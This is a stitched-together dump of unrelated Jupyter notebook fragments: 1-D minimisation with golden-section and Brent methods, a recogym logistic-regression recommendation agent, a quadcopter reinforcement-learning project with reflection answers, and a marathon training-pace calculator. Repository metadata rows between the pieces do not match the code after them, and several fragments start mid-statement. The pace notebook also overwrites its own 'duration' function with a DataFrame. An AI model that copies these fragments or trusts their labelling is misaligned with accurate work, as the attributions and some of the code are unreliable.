df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.01, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[1], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[3], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
fn, method_name = functions[4], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.0001, fn["title"])
plot_log_e_to_num_iters(fn["fn"], method_name, fn["a"], fn["b"], fn["title"])
print(f"x_min: {x_min}; y_min: {y_min}")
df
# ### Часть 3
# +
def f6(x):
return 0.007 * x ** 6 - 0.15 * x ** 5 + 1.14 * x ** 4 - 3.5 * x ** 3 + 2.9 * x ** 2 + 2.95 * x + 2.25
functions[5] = (dict(fn=f6, a=-1, b=6.5, title="$f_6 = 0.007 x^6 - 0.15 x^5 + 1.14 * x^4 - 3.5 x^3 + 2.9 x^2 + 2.95 x + 2.25$"))
# +
x = np.linspace(functions[5]["a"], functions[5]["b"], 40)
y = list(map(functions[5]["fn"], x))
plt.plot(x, y)
plt.title(functions[5]["title"])
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
# -
fn, method_name = functions[5], "golden-section"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
fn, method_name = functions[5], "brent"
df, x_min, y_min = minimize_1d(fn["fn"], method_name, fn["a"], fn["b"], 0.001, fn["title"])
# На примере выше видно, что методы золотого сечения и Брента не смогли найти правильный минимум мультимодальной функции. Необходимое условие для корректной работы вышеописанных алгоритмов -- унимодальность функции на интересующем отрезке, поскольку сразу же в рассматриваемом интервале мы берем некоторые точки по середине и делаем сравнение значений функции на краях и в середине интервала. Такой подход не преподлагает наличие более одного экстремума (минимума).
| 9,319 |
/Quadcopter_Project.ipynb
|
9d17fe15b73b445fb2c97f7039b36bf7792d0e68
|
[] |
no_license
|
pawlokam/Quadcopter_RL
|
https://github.com/pawlokam/Quadcopter_RL
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 173,075 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# # !pip install recogym
# -
# # Likelihood-based models
#
# This notebook will outline the likelihood-based approach to training on Bandit feedback.
#
# Although before proceeding, we will study the output of the simulator in a little more detail.
# +
from numpy.random.mtrand import RandomState
from recogym import Configuration
from recogym.agents import Agent
from sklearn.linear_model import LogisticRegression
from recogym import verify_agents
from recogym.agents import OrganicUserEventCounterAgent, organic_user_count_args
from recogym.agents import RandomAgent, random_args
from recogym.evaluate_agent import verify_agents, plot_verify_agents
import gym, recogym
from copy import deepcopy
from recogym import env_1_args
import matplotlib.pyplot as plt
import numpy as np
# %matplotlib inline
# %config InlineBackend.figure_format = 'retina'
plt.rcParams['figure.figsize'] = [6, 3]
num_users = 4000
env_1_args['number_of_flips'] = 0
env_1_args['sigma_mu_organic'] = 0.0
env_1_args['sigma_omega'] = 1
env_1_args['random_seed'] = 42
env_1_args['num_products'] = 10
env_1_args['K'] = 5
env_1_args['number_of_flips'] = 5
env = gym.make('reco-gym-v1')
env.init_gym(env_1_args)
# -
data = deepcopy(env).generate_logs(num_users)
# # Logistic Regression Model
#
# ## Turn Data into Features
#
# Now we are going to build a _Logistic Regression_ model.
#
# The model will predict _the probability of the click_ for the following data:
# * _`Views`_ is a total amount of views of a particular _`Product`_ shown during _Organic_ _`Events`_ **before** a _Bandit_ _`Event`_.
# * _`Action`_ is a proposed _`Product`_ at a _Bandit_ _`Event`_.
#
# For example, assume that we have _`10`_ products. In _Organic_ _`Events`_ , these products were shown to a user as follows:
#
# | Product Id | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
# |------------|---|---|---|---|---|---|---|---|----|---|
# | Views | 0 | 0 | 0 | 7 | 0 | 0 | 0 | 8 | 11 | 0 |
#
# When we want to know the probability of the click for _`Product`_ = _`8`_ with available amounts of _`Views`_ , the input data for the model will be:
#
# $v = $_`0 0 0 7 0 0 0 8 11 0`_ and _**`8`**_
#
# The first `10` numbers are _`Views`_ of _`Products`_ (see above), the latest one is the _`Action`_.
#
# We will try to predict: $\mathbb{P}(C|P=p, V)$ that is the probability of the click for a _`Product`_ $p$, provided that we have _`Views`_ $V$.
#
# We will encode _`Action`_ using a one-hot encoding.
# In our current example, the _`Action`_ is _`8`_. Thus, it is encoded as:
#
# _$a = $`0 0 0 0 0 0 0 0`_ _**`1`**_ _`0`_
#
# Here,
# * Vector of _`Actions`_ has a size that is equal to the _*number of `Products`*_ i.e., _`10`_.
# * _`Action`_ _`8`_ is marked as _`1`_ (_`Action`_ starts with _`0`_ ).
#
# Numerically, to fully describe the context $P=p, V$ that mixes the evaluated product and the products seen by the user, we do a Kronecker product of the two vectors $a$ and $v$.
# Namely, the vector used as features is the flattened version of the following $P \times P$ matrix
# $$
# \begin{pmatrix}
# \cdots & 0 & \cdots \\
# & \vdots & \\
# \cdots & v & \cdots \\
# & \vdots & \\
# \cdots & 0 & \cdots
# \end{pmatrix}
# \leftarrow \text{ only the line corresponding the the action $p$ is non zero}
# $$
# +
from recogym.agents import FeatureProvider
class CountFeatureProvider(FeatureProvider):
"""Feature provider as an abstract class that defines interface of setting/getting features"""
def __init__(self, config):
super(CountFeatureProvider, self).__init__(config)
self.feature_data = np.zeros((self.config.num_products))
def observe(self, observation):
"""Consider an Organic Event for a particular user"""
for session in observation.sessions():
self.feature_data[int(session['v'])] += 1
def features(self, observation):
"""Provide feature values adjusted to a particular feature set"""
return self.feature_data
def reset(self):
self.feature_data = np.zeros((self.config.num_products))
# +
import math
import numpy as np
from recogym import Configuration, DefaultContext, Observation
from recogym.envs.session import OrganicSessions
def build_train_data(logs, feature_provider):
user_states, actions, rewards, proba_actions = [], [], [], []
current_user = None
for _, row in logs.iterrows():
if current_user != row['u']:
# User has changed: start a new session and reset user state.
current_user = row['u']
sessions = OrganicSessions()
feature_provider.reset()
context = DefaultContext(row['u'], row['t'])
if row['z'] == 'organic':
sessions.next(context, row['v'])
else:
# For each bandit event, generate one observation for the user state,
# the taken action the obtained reward and the used probabilities.
feature_provider.observe(Observation(context, sessions))
user_states.append(feature_provider.features(None).copy())
actions.append(row['a'])
rewards.append(row['c'])
proba_actions.append(row['ps'])
# Start a new organic session.
sessions = OrganicSessions()
return np.array(user_states), np.array(actions).astype(int), np.array(rewards), np.array(proba_actions)
# +
# You can now see data that will be provided to our agents based on logistic regressions.
config = Configuration(env_1_args)
count_feature_provider = CountFeatureProvider(config=config)
user_states, actions, rewards, proba_actions = build_train_data(data, count_feature_provider)
# +
preview_start, preview_size = 500, 3
print('User product views count at action time:')
print(user_states[preview_start:preview_start + preview_size])
print('Taken actions: ', actions[preview_start:preview_start + preview_size])
print('Obtained rewards: ', rewards[preview_start:preview_start + preview_size])
print('Probablities of the taken actions: ', proba_actions[preview_start:preview_start + preview_size])
# -
# Look at the data and see how it maps into the features - which is the combination of the history and the actions and the label, which is clicks. Note that only the bandit events correspond to records in the training data.
#
# To make a personalization, it is necessary to cross the action and history features. _Why_ ? We do the simplest possible to cross an element-wise Kronecker product.
class LikelihoodAgent(Agent):
def __init__(self, feature_provider, seed=43):
self.feature_provider = feature_provider
self.random_state = RandomState(seed)
self.model = None
@property
def num_products(self):
return self.feature_provider.config.num_products
def _create_features(self, user_state, action):
"""Create the features that are used to estimate the expected reward from the user state"""
features = np.zeros(len(user_state) * self.num_products)
features[action * len(user_state): (action + 1) * len(user_state)] = user_state
return features
def train(self, logs):
user_states, actions, rewards, proba_actions = build_train_data(logs, self.feature_provider)
features = np.vstack([
self._create_features(user_state, action)
for user_state, action in zip(user_states, actions)
])
self.model = LogisticRegression(solver='lbfgs', max_iter=5000)
self.model.fit(features, rewards)
def _score_products(self, user_state):
all_action_features = np.array([
self._create_features(user_state, action)
for action in range(self.num_products)
])
return self.model.predict_proba(all_action_features)[:, 1]
def act(self, observation, reward, done):
"""Act method returns an action based on current observation and past history"""
self.feature_provider.observe(observation)
user_state = self.feature_provider.features(observation)
prob = self._score_products(user_state)
action = np.argmax(prob)
ps = 1.0
all_ps = np.zeros(self.num_products)
all_ps[action] = 1.0
return {
**super().act(observation, reward, done),
**{
'a': action,
'ps': ps,
'ps-a': all_ps,
}
}
def reset(self):
self.feature_provider.reset()
# +
# Have a look at the feature vector used by the Likelihood agent.
picked_sample = 500
count_product_views_feature_provider = CountFeatureProvider(config)
likelihood_logreg = LikelihoodAgent(count_product_views_feature_provider)
print('User state: ', user_states[picked_sample])
print('Action: ', actions[picked_sample])
print('Created cross features:')
print(likelihood_logreg._create_features(user_states[picked_sample], actions[picked_sample]))
# +
# %%time
likelihood_logreg = LikelihoodAgent(count_product_views_feature_provider)
likelihood_logreg.train(data)
# +
organic_counter_agent = OrganicUserEventCounterAgent(
Configuration({
**organic_user_count_args,
**env_1_args,
'select_randomly': True,
})
)
random_agent = RandomAgent(Configuration(random_args))
# +
result = verify_agents(
env,
number_of_users=2000,
agents={
'random agent': random_agent,
'Organic Count': organic_counter_agent,
'Likelihood LogReg': likelihood_logreg,
}
)
# -
fig = plot_verify_agents(result)
plt.show()
i_episode in range(1, num_episodes+1):
state = agent.reset_episode() # start a new episode
while True:
action = agent.act(state)
next_state, reward, done = task.step(action)
agent.step(reward, done)
state = next_state
if done:
print("\rEpisode = {:4d}, score = {:7.3f} (best = {:7.3f}), noise_scale = {}".format(
i_episode, agent.score, agent.best_score, agent.noise_scale), end="") # [debug]
break
sys.stdout.flush()
# -
# This agent should perform very poorly on this task. And that's where you come in!
# ## Define the Task, Design the Agent, and Train Your Agent!
#
# Amend `task.py` to specify a task of your choosing. If you're unsure what kind of task to specify, you may like to teach your quadcopter to takeoff, hover in place, land softly, or reach a target pose.
#
# After specifying your task, use the sample agent in `agents/policy_search.py` as a template to define your own agent in `agents/agent.py`. You can borrow whatever you need from the sample agent, including ideas on how you might modularize your code (using helper methods like `act()`, `learn()`, `reset_episode()`, etc.).
#
# Note that it is **highly unlikely** that the first agent and task that you specify will learn well. You will likely have to tweak various hyperparameters and the reward function for your task until you arrive at reasonably good behavior.
#
# As you develop your agent, it's important to keep an eye on how it's performing. Use the code above as inspiration to build in a mechanism to log/save the total rewards obtained in each episode to file. If the episode rewards are gradually increasing, this is an indication that your agent is learning.
# +
## TODO: Train your agent here.
import sys
import numpy as np
import pandas as pd
import csv
from agents.agent import DDPG
from task import Task
#### Take off task ####
# Redefine variables declared earlier for convenience
# Modify the values below to give the quadcopter a different starting position.
runtime = 5. # time limit of the episode
init_pose = np.array([0., 0., 0., 0., 0., 0.]) # initial pose
init_velocities = np.array([0., 0., 0.]) # initial velocities
init_angle_velocities = np.array([0., 0., 0.]) # initial angle velocities
output_file = 'take_off_rewards.txt' # file name for saved results
num_episodes = 1000
target_pos = np.array([0., 0., 10.])
task = Task(target_pos=target_pos)
agent = DDPG(task)
done = False
# Define labels
labels = ['episode', 'total_reward', 'time', 'x', 'y', 'z', 'x_velocity',
'y_velocity', 'z_velocity']
results = {x : [] for x in labels}
with open(output_file, 'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(labels)
best_total_reward = 0
for i_episode in range(1,num_episodes+1):
# Start a new episode and reset total reward
state = agent.reset_episode()
total_reward = 0
while True:
action = agent.act(state)
next_state, reward, done = task.step(action)
total_reward += reward
if total_reward > best_total_reward:
best_total_reward = total_reward
agent.step(action, reward, next_state, done)
state = next_state
if done:
data_to_write = [i_episode] + [total_reward] + [task.sim.time] + list(task.sim.pose) + list(task.sim.v)
for i in range(len(labels)):
results[labels[i]].append(data_to_write[i])
writer.writerow(data_to_write)
print("\rEpisode = {:4d}, total_reward = {:7.3f} (best = {:7.3f})".format(
i_episode, total_reward, best_total_reward), end="")
break
sys.stdout.flush()
# -
# ## Plot the Rewards
#
# Once you are satisfied with your performance, plot the episode rewards, either from a single run, or averaged over multiple runs.
# +
## TODO: Plot the rewards.
'''Plot rewards for the take off task '''
import matplotlib.pyplot as plt
# %matplotlib inline
plt.plot(results['episode'], results['total_reward'])
#plt.legend()
_ = plt.ylim()
# -
# ## Reflections
#
# **Question 1**: Describe the task that you specified in `task.py`. How did you design the reward function?
#
# **Answer**: I specified the take off task in the task.py. I've restricted the reward to be between -1 and 1 - I found that it helped get more consistent rewards between different training attempts.
# **Question 2**: Discuss your agent briefly, using the following questions as a guide:
#
# - What learning algorithm(s) did you try? What worked best for you?
# - What was your final choice of hyperparameters (such as $\alpha$, $\gamma$, $\epsilon$, etc.)?
# - What neural network architecture did you use (if any)? Specify layers, sizes, activation functions, etc.
#
# **Answer**:
#
# Final values of hyperparameters:
# $\gamma$ = 0.99
#
# For both actor and critic classes I've used a neural networks.
# For the actor class I've created a neural network with 4 fully connected hidden layers with 32, 64, 128 and 64 units. For every layer I've used batch normalization, ReLu activation function and dropout (with probability equal to 0.5). Below I've pasted the implementation of one of the layers from agent.py:
#
# net = layers.Dense(units = 32, use_bias = False, kernel_regularizer = regularizers.l2(0.01), activity_regularizer = regularizers.l1(0.01))(states)
#
# net = layers.BatchNormalization()(net)
#
# net = layers.Activation('relu')(net)
#
# net = layers.Dropout(0.5)(net)
#
# In case of the critic class I also created a nearal network, this time with 3 fully connected hidden layers (same architecture was defined for state and action pathways) with 32, 64 and 128 units. For every layer I've used batch normalization, ReLu activation function and dropout (with probability equal to 0.5). Implementation was similar to the one for NN in actor class.
# **Question 3**: Using the episode rewards plot, discuss how the agent learned over time.
#
# - Was it an easy task to learn or hard?
# - Was there a gradual learning curve, or an aha moment?
# - How good was the final performance of the agent? (e.g. mean rewards over the last 10 episodes)
#
# **Answer**: From what I can see in the plot it wasn't easy to learn that task. On many attempts I've got a lot of spikes/drops on the total reward plot which makes me think that there has to be an 'aha' moment for the agent. Additionally those spikes make it hard to observe gradual learning curve if such exists.
# **Question 4**: Briefly summarize your experience working on this project. You can use the following prompts for ideas.
#
# - What was the hardest part of the project? (e.g. getting started, plotting, specifying the task, etc.)
# - Did you find anything interesting in how the quadcopter or your agent behaved?
#
# **Answer**: It was quite difficult to figure out how to start the implementation - the provided suggestions and starter code were really helpfull.
# The surprising thing about the training process was that there was a lot of spikes/drops on the total reward plot and not always I could see a gradual improvement - this was also causing some problems as I wasn't sure if the program needs more time to train or was there a problem in the implementation.
| 17,330 |
/qualitative_clustering_analysis/smba_quantitative_clustering_analysis.ipynb
|
6078c0c4f86974f02aaf189310141a0a58b03fb4
|
[] |
no_license
|
zhihanyang2022/GMVAE
|
https://github.com/zhihanyang2022/GMVAE
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 190,701 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Metis - Beginner Python & Math for Data Science project
#
# ## Run Like a Hobbit
#
# As a runner, [Marathon Maniac](https://www.marathonmaniacs.com/)/[Half Fanatic](https://www.halffanatics.com/)/[Double Agent](https://www.marathonmaniacs.com/double-agent-criteria) and [RRCA](https://www.rrca.org/) coach, I'm always looking for more information about and better answers to the following questions in order to continue improving/achieving my goals, avoiding overtraining and injury and having fun...
#
# * How much work (i.e. Time, effort (or how fast I have to run during each part of a training plan) and distance) is required to achieve a particular distance/time goal?
# * How much of the required work did I complete and how close was I to the prescribed level of effort (keeping in mind that runners should avoid training harder than they need to as this can lead to overtraining and injury)?
# * Under what conditions did I train (Data such as heart rate and other temporal and environmental variables can be tracked)?
# * Did I achieve the goal I trained for? If not, how much did I miss it by?
# * Can I achieve the same goal with less work?... Or, how much and how fast can I increase my training intensity/improve while avoiding overtraining and injury?
# +
# https://stackoverflow.com/questions/6808064/parsing-hhmm-in-python
# https://docs.python.org/3/library/time.html
import time
def time_in_minutes(time_str):
try:
t = time.strptime(time_str, "%H:%M:%S")
except ValueError:
# Try to parse minutes and seconds instead of hours, minutes and seconds
t = time.strptime(time_str, "%M:%S")
return t.tm_hour * 60 + t.tm_min + t.tm_sec / 60
def minutes_in_seconds(time_str):
t = time.strptime(time_str, "%M:%S")
return t.tm_min * 60 + t.tm_sec
# Example/test values
goal_time = "3:45:00"
pace_per_mile_5K = "7:25"
goal_time_minutes = time_in_minutes(goal_time)
pace_per_mile_5K_minutes = time_in_minutes(pace_per_mile_5K)
print("- Goal time (Minutes): {}".format(goal_time_minutes))
print("- 5K interval pace (Minutes/mile): {}".format(pace_per_mile_5K_minutes))
# To round the result to two decimal places...
#
# https://mkaz.blog/code/python-string-format-cookbook/
# format_2_decimal_places = "{:.2f}"
# print("- Goal time (Minutes/mile rounded to two decimal places): {}".format(format_2_decimal_places.format(pace_per_mile_5K_minutes)))
pace_per_mile_5K_seconds = minutes_in_seconds(pace_per_mile_5K)
print("- 5K interval pace (Seconds/mile): {}".format(pace_per_mile_5K_seconds))
# +
# http://lmgtfy.com/?q=miles+to+kilometers
seconds_per_km = pace_per_mile_5K_seconds / 1.60934
meters_per_second = 1000 / seconds_per_km
print("- Seconds per kilometer: {}".format(seconds_per_km))
print("- Meters per second: {}".format(meters_per_second))
def seconds_per_km(meters_per_second):
return 1000 / meters_per_second
def seconds_per_mile(meters_per_second):
return (1000 * 1.60934) / meters_per_second
print("- Seconds per kilometer (assuming a speed of {} m/s): {}".format(meters_per_second, seconds_per_km(meters_per_second)))
print("- Seconds per mile (assuming a speed of {} m/s): {}".format(meters_per_second, seconds_per_mile(meters_per_second)))
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker
# +
# https://www.baa.org/races/boston-marathon/enter/boston-marathon-training
pace_chart = pd.read_json('./pace-chart.json', orient='columns')
pace_chart.columns = \
['2:45:00', '3:00:00', '3:15:00', '3:30:00', '3:45:00', '4:00:00', '4:15:00', '4:30:00', '4:45:00', '5:00:00']
pace_chart = \
pace_chart.reindex(['5K Interval Pace', '10K Interval Pace', 'Half Marathon Pace', 'Marathon Pace', 'Easy Runs', 'Aerobic Runs'])
pace_chart
# +
pace_chart_seconds = pace_chart.applymap(lambda x: minutes_in_seconds(x))
pace_chart_seconds
# +
# Since the plot was initially too small...
#
# Get and print the plot's current/default size
# plot_size = plt.rcParams[ 'figure.figsize' ]
# print("Plot size: {}".format(plot_size))
# Make the plot bigger
plt.rcParams['figure.figsize'] = [18, 12]
ax = plt.gca()
# https://stackoverflow.com/questions/40395227/minute-and-second-format-for-x-label-of-matplotlib
formatter = \
matplotlib.ticker.FuncFormatter(lambda seconds, pos: time.strftime('%M:%S', time.gmtime(seconds)))
ax.yaxis.set_major_formatter(formatter)
plt.plot('2:45:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:15:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:30:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('3:45:00', data=pace_chart_seconds, linestyle='dashed', linewidth=3, marker='o', markersize=8)
plt.plot('4:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:15:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:30:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('4:45:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.plot('5:00:00', data=pace_chart_seconds, marker='o', markersize=6)
plt.title("Average required pace for the plan training paces", fontsize=18, fontweight='bold')
plt.xlabel('Training pace', fontsize=14, fontweight='bold')
plt.ylabel('Minutes/mile', fontsize=14, fontweight='bold')
plt.legend()
plt.show()
# +
# Some attempts at getting a DataFrame's row...
# Both of the following examples return a particular row
# row_1 = normalized_pace_chart.iloc[0,]
# print('-- Row ({}) --'.format(type(row_1)))
# print(row_1)
# row_2 = normalized_pace_chart.iloc[:1]
# print('-- Row ({}) --'.format(type(row_2)))
# print(row_2)
# 4 = 3:45:00 goal time
GOAL_TIME = 4
goal_time_paces = pace_chart_seconds.iloc[:,GOAL_TIME]
print('---- Training paces per mile (in seconds) for a 3:45:00 goal time ({}) ----'.format(type(goal_time_paces)))
print(goal_time_paces)
training_pace_5K = goal_time_paces[0]
print('\n- 5K training pace (in seconds) for a 3:45:00 goal time (Type: {}): {}'.format(type(training_pace_5K), training_pace_5K))
# +
import datetime
plan = pd.read_json('./plan-baa-2019-level-4.json', orient='columns')
plan = \
plan.reindex(['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'])
# TODO
# print(type(plan.iloc[:1,0]))
# print(type(plan.iloc[:1,0][0]['segments'][0]['distanceMin']))
# -- Constants --
DISTANCE_METERS = 0
DISTANCE_KMS = 1
DISTANCE_MILES = 2
# ---- Activity segments ----
KEY_SEGMENTS = 'segments'
KEY_DURATION = 'duration'
KEY_PACE = 'pace'
KEY_DISTANCE_MIN = 'distanceMin'
KEY_DISTANCE_MAX = 'distanceMax'
KEY_UNITS = 'units'
# ---- Repeats ----
KEY_REPEAT = 'repeat'
KEY_WORK = 'work'
KEY_REST = 'rest'
KEY_RECOVER = 'recover'
# TODO: Use KEY_DISTANCE_MIN instead?
KEY_DISTANCE = 'distance'
print('---- Goal time paces (Seconds/mile) ----')
print(goal_time_paces)
def distance(cell, goal_time_paces, distance_key = KEY_DISTANCE_MIN, result_units = DISTANCE_MILES):
result = 0
if KEY_SEGMENTS in cell.keys():
segments = cell[KEY_SEGMENTS]
# Only loop through `segments` if it's truthy (i.e. If it contains one or more segments)
if segments:
for segment in segments:
keys = segment.keys()
# If a distance has been specified, add it to the cell's total
if distance_key in keys:
result += segment[distance_key]
# If the value for the specified distance (For example, KEY_DISTANCE_MAX) isn't found but
# a minimum distance value is found, use that instead
elif distance_key not in keys and KEY_DISTANCE_MIN in keys:
result += segment[KEY_DISTANCE_MIN]
# If a duration has been specified instead of a distance, add the distance covered
# during the specified duration given the specified pace to the cell's total
elif distance_key not in keys and KEY_DURATION in keys:
result += \
distance_covered(segment[KEY_DURATION], goal_time_paces[segment[KEY_PACE]])
# If the segment is a repeat...
elif KEY_REPEAT in keys:
result += repeat_distance(segment, goal_time_paces, result_units)
return round(float(result), 5)
def repeat_distance(segment, goal_time_paces, result_units):
repeat = segment[KEY_REPEAT]
work = segment[KEY_WORK]
# TODO
rest = None
# Repeat distance is calculated in one of two ways:
#
# - If a `work` and/or `recover` part's `distance` is specified, multiply its value by
# `repeat` and add the result to the segment's total
# - If a `work` and/or `recover` part's `duration` is specified (and it's `distance`
# isn't), add the distance covered during the specified duration given the specified
# pace, multiply its value by `repeat` and add the result to the segment's total
result = 0
result += distance_from_distance_or_duration(work, goal_time_paces[work[KEY_PACE]], repeat)
# Repeats may or may not include rest periods between the work and recovery periods
if KEY_REST in segment.keys():
rest = segment[KEY_REST]
# Repeats may or may not also include recovery periods
if KEY_RECOVER in segment.keys():
recover = segment[KEY_RECOVER]
result += distance_from_distance_or_duration(recover, goal_time_paces[work[KEY_PACE]], repeat)
return round(result, 6)
def distance_from_distance_or_duration(part, seconds_per_mile, repeat, result_units = DISTANCE_MILES):
result = 0
if KEY_DISTANCE in part:
distance = part[KEY_DISTANCE]
units = part[KEY_UNITS]
unit_converter = 1
# If `units` isn't the same as `result_units` - A part's distance may be specified
# in meters (if, for example, it's a 400 meter repeat) - convert the part's
# distance into the specified result units
if units != result_units:
unit_converter = get_unit_converter(units, result_units)
result += (distance * repeat) / unit_converter
else:
result += distance_covered(part[KEY_DURATION], seconds_per_mile, repeat)
return result
def duration(cell, goal_time_paces, distance_key = KEY_DISTANCE_MIN):
result = 0
if KEY_SEGMENTS in cell.keys():
segments = cell[KEY_SEGMENTS]
# Only loop through `segments` if it's truthy (i.e. If it contains one or more segments)
if segments:
for segment in segments:
keys = segment.keys()
if KEY_PACE in keys:
pace_seconds_per_mile = segment[KEY_PACE]
if distance_key in keys:
result += segment[distance_key] * goal_time_paces[pace_seconds_per_mile]
# TODO
# d = datetime.timedelta(seconds=int(result))
# If a duration has been specified instead of a distance, add the distance covered
# during the specified duration given the specified pace to the result
elif distance_key not in keys and KEY_DURATION in keys:
result += \
distance_covered(segment[KEY_DURATION], goal_time_paces[segment[KEY_PACE]])
# elif 'repeat' in keys:
# TODO
return result
def get_unit_converter(units, result_units):
# Meters to miles - http://bfy.tw/NCEZ
if units == DISTANCE_METERS and result_units == DISTANCE_MILES:
return 1609.344
# Kilometers to miles
elif units == DISTANCE_KMS and result_units == DISTANCE_MILES:
return 1.609
def distance_covered(duration, pace, repeat = 1):
# The distance covered in `duration` is `duration / pace` multiplied by the number of
# times the duration is repeated
#
# Example:
#
# If the duration of the effort is 300 seconds (i.e. 5 minutes) and the required pace
# is 500 seconds per mile, the distance covered in 300 seconds is 300 / 500 or 0.6 miles
return (duration / pace) * repeat
# https://stackoverflow.com/questions/39475978/apply-function-to-each-cell-in-dataframe
distance_min = plan.applymap(lambda x: distance(x, goal_time_paces))
print('\n---- Weekly distance ----')
print('-- Minimum --')
print(distance_min)
print('-- Totals/week (Minimum) --')
print(distance_min.sum())
distance_max = plan.applymap(lambda x: distance(x, goal_time_paces, KEY_DISTANCE_MAX))
print('\n-- Maximum --')
print(distance_max)
print('-- Totals/week (Maximum) --')
print(distance_max.sum())
duration = plan.applymap(lambda x: duration(x, goal_time_paces))
print('\n---- Weekly duration ----')
print(duration)
# +
# https://python-graph-gallery.com/11-grouped-barplot/
bar_width = 0.2
# The position of the bars on the x axis
#
# Return evenly spaced values within a given interval
range_distance_min = np.arange(len(distance_min.sum()))
range_distance_max = [x + bar_width for x in range_distance_min]
plt.bar(range_distance_min, distance_min.sum(), width=bar_width, edgecolor='white', label='Min distance')
plt.bar(range_distance_max, distance_max.sum(), width=bar_width, edgecolor='white', label='Max distance')
plt.xlabel('Week', fontweight='bold')
# Add the xticks in the middle of the group bars
plt.xticks([r + bar_width for r in range(len(range_distance_min))], [1, 2, 3, 4])
plt.ylabel('Miles', fontweight='bold')
# Create the legend and show the graph
plt.legend()
plt.show()
# -
| 13,863 |
/src/DistintosAlgoritmos/parameterTunningAdaBoost.ipynb
|
068a63f1bd5bab6fd3a4882ecea1dfbccd24a412
|
[] |
no_license
|
sebalogue/tp2-datos
|
https://github.com/sebalogue/tp2-datos
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 10,540 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="xnRlapMeliF-" colab_type="code" outputId="07ae3ee3-2c34-4881-8c0e-b76d900751ca" colab={"resources": {"http://localhost:8080/nbextensions/google.colab/files.js": {"data": "Ly8gQ29weXJpZ2h0IDIwMTcgR29vZ2xlIExMQwovLwovLyBMaWNlbnNlZCB1bmRlciB0aGUgQXBhY2hlIExpY2Vuc2UsIFZlcnNpb24gMi4wICh0aGUgIkxpY2Vuc2UiKTsKLy8geW91IG1heSBub3QgdXNlIHRoaXMgZmlsZSBleGNlcHQgaW4gY29tcGxpYW5jZSB3aXRoIHRoZSBMaWNlbnNlLgovLyBZb3UgbWF5IG9idGFpbiBhIGNvcHkgb2YgdGhlIExpY2Vuc2UgYXQKLy8KLy8gICAgICBodHRwOi8vd3d3LmFwYWNoZS5vcmcvbGljZW5zZXMvTElDRU5TRS0yLjAKLy8KLy8gVW5sZXNzIHJlcXVpcmVkIGJ5IGFwcGxpY2FibGUgbGF3IG9yIGFncmVlZCB0byBpbiB3cml0aW5nLCBzb2Z0d2FyZQovLyBkaXN0cmlidXRlZCB1bmRlciB0aGUgTGljZW5zZSBpcyBkaXN0cmlidXRlZCBvbiBhbiAiQVMgSVMiIEJBU0lTLAovLyBXSVRIT1VUIFdBUlJBTlRJRVMgT1IgQ09ORElUSU9OUyBPRiBBTlkgS0lORCwgZWl0aGVyIGV4cHJlc3Mgb3IgaW1wbGllZC4KLy8gU2VlIHRoZSBMaWNlbnNlIGZvciB0aGUgc3BlY2lmaWMgbGFuZ3VhZ2UgZ292ZXJuaW5nIHBlcm1pc3Npb25zIGFuZAovLyBsaW1pdGF0aW9ucyB1bmRlciB0aGUgTGljZW5zZS4KCi8qKgogKiBAZmlsZW92ZXJ2aWV3IEhlbHBlcnMgZm9yIGdvb2dsZS5jb2xhYiBQeXRob24gbW9kdWxlLgogKi8KKGZ1bmN0aW9uKHNjb3BlKSB7CmZ1bmN0aW9uIHNwYW4odGV4dCwgc3R5bGVBdHRyaWJ1dGVzID0ge30pIHsKICBjb25zdCBlbGVtZW50ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc3BhbicpOwogIGVsZW1lbnQudGV4dENvbnRlbnQgPSB0ZXh0OwogIGZvciAoY29uc3Qga2V5IG9mIE9iamVjdC5rZXlzKHN0eWxlQXR0cmlidXRlcykpIHsKICAgIGVsZW1lbnQuc3R5bGVba2V5XSA9IHN0eWxlQXR0cmlidXRlc1trZXldOwogIH0KICByZXR1cm4gZWxlbWVudDsKfQoKLy8gTWF4IG51bWJlciBvZiBieXRlcyB3aGljaCB3aWxsIGJlIHV